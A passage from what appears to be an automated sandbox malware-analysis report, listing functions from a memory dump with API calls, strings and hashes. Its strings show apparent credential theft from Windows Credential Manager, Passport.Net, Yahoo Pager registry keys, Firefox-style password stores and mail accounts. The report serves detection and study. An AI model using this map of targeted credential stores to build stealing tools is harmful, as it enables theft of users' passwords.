                                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                          • CloseHandle.KERNEL32(?), ref: 00444206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                          • String ID: ACD
                                          • API String ID: 1886237854-620537770
                                          • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                          • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                          Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004091EC
                                          • sprintf.MSVCRT ref: 00409201
                                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                            • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                          • SetWindowTextA.USER32(?,?), ref: 00409228
                                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                          • String ID: caption$dialog_%d
                                          • API String ID: 2923679083-4161923789
                                          • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                          • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                          Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • unknown error, xrefs: 004277B2
                                          • no such savepoint: %s, xrefs: 00426A02
                                          • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                          • abort due to ROLLBACK, xrefs: 00428781
                                          • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                          • API String ID: 3510742995-3035234601
                                          • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                          • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                          • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                          • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                          Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                          • API String ID: 2221118986-3608744896
                                          • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                          • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                          • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                          • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                          Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                          • memset.MSVCRT ref: 00410246
                                          • memset.MSVCRT ref: 00410258
                                            • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                          • memset.MSVCRT ref: 0041033F
                                          • _mbscpy.MSVCRT ref: 00410364
                                          • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                          • String ID:
                                          • API String ID: 3974772901-0
                                          • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                          • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                          Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wcslen.MSVCRT ref: 0044406C
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                          • strlen.MSVCRT ref: 004440D1
                                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                          • memcpy.MSVCRT ref: 004440EB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                          • String ID:
                                          • API String ID: 577244452-0
                                          • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                          • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                          Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                          • _strcmpi.MSVCRT ref: 00404518
                                          • _strcmpi.MSVCRT ref: 00404536
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _strcmpi$memcpystrlen
                                          • String ID: imap$pop3$smtp
                                          • API String ID: 2025310588-821077329
                                          • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                          • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                          Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040C02D
                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                            • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          • API String ID: 2726666094-3614832568
                                          • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                          • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                          Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                          • OpenClipboard.USER32(?), ref: 0040C1B1
                                          • GetLastError.KERNEL32 ref: 0040C1CA
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                          • String ID:
                                          • API String ID: 2014771361-0
                                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                          Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcmp.MSVCRT ref: 00406151
                                            • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                          • memcmp.MSVCRT ref: 0040617C
                                          • memcmp.MSVCRT ref: 004061A4
                                          • memcpy.MSVCRT ref: 004061C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: global-salt$password-check
                                          • API String ID: 231171946-3927197501
                                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                          Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                          • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                          Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004016A3
                                          • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                          • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                          • BeginPaint.USER32(?,?), ref: 004016D7
                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                          • EndPaint.USER32(?,?), ref: 004016F3
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                          • String ID:
                                          • API String ID: 19018683-0
                                          • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                          • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                          • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                          • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                          Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040644F
                                          • memcpy.MSVCRT ref: 00406462
                                          • memcpy.MSVCRT ref: 00406475
                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                          • memcpy.MSVCRT ref: 004064B9
                                          • memcpy.MSVCRT ref: 004064CC
                                          • memcpy.MSVCRT ref: 004064F9
                                          • memcpy.MSVCRT ref: 0040650E
                                            • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                          Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                          • strlen.MSVCRT ref: 0040F7BE
                                          • _mbscpy.MSVCRT ref: 0040F7CF
                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                          • String ID: Passport.Net\*
                                          • API String ID: 2329438634-3671122194
                                          • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                          • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                          • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                          • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                          Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                          • memset.MSVCRT ref: 0040330B
                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                          • strchr.MSVCRT ref: 0040335A
                                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                          • strlen.MSVCRT ref: 0040339C
                                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                          • String ID: Personalities
                                          • API String ID: 2103853322-4287407858
                                          • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                          • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                          Function 00410863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                          • memcpy.MSVCRT ref: 004108C3
                                          Strings
                                          • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                          • API String ID: 2859077140-3316789007
                                          • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                          • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                          • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                          • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                          Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00444573
                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValuememset
                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                          • API String ID: 1830152886-1703613266
                                          • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                          • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                          Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: H
                                          • API String ID: 2221118986-2852464175
                                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                          Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                          • API String ID: 3510742995-3170954634
                                          • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                          • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                          • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                          • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                          Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: winWrite1$winWrite2
                                          • API String ID: 438689982-3457389245
                                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                          • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                          Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: winRead
                                          • API String ID: 1297977491-2759563040
                                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                          Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: gj
